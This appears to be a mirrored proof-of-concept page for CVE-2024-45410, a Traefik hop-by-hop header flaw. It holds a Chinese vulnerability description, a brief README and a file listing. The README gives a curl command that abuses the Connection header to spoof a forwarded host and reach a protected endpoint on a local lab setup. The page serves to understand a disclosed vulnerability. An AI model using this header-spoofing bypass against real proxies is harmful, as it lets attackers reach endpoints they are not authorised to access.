CVE-2024-45410 PoC — Traefik 安全漏洞

Source

https://github.com/jphetphoumy/traefik-CVE-2024-45410-poc

Associated Vulnerability

Title:Traefik 安全漏洞 (CVE-2024-45410)
Description:Traefik是Traefik开源的一款开源的反向代理与负载均衡工具。 Traefik 2.11.8及之前版本和v3.1.2及之前版本存在安全漏洞，该漏洞源于HTTP/1.1协议下通过HTTP Connection头定义某些特定HTTP头作为跳跃头，导致这些头可以被移除或在某些情况下被篡改。

Description

A proof of concept of traefik CVE to understand the impact

Readme

# Proof of Concept of CVE CVE-2024-45410

Resources: https://github.com/traefik/traefik/security/advisories/GHSA-62c8-mh53-4cqv

# How-To

Run `curl -i http://flask.localhost/protected`, you shouldn't be able to query the endpoint.

The allowed host are 127.0.0.1, let's use the following query to make a hop-by-hop header via Connection: 

`curl -i http://flask.localhost/protected -H "Connection: X-Forwarded-Host" -H "X_Forwarded_Host: 127.0.0.1"`

You should be able to see the protected endpoint

File Snapshot


 [4.0K]  /data/pocs/4b364d2f1501ab13ad76a1f4f05a2e1f7d6407a6
├── [ 703]  backend.py
├── [ 645]  docker-compose.yml
├── [ 195]  Dockerfile.backend
├── [ 503]  README.md
└── [  29]  requirements.txt

0 directories, 5 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!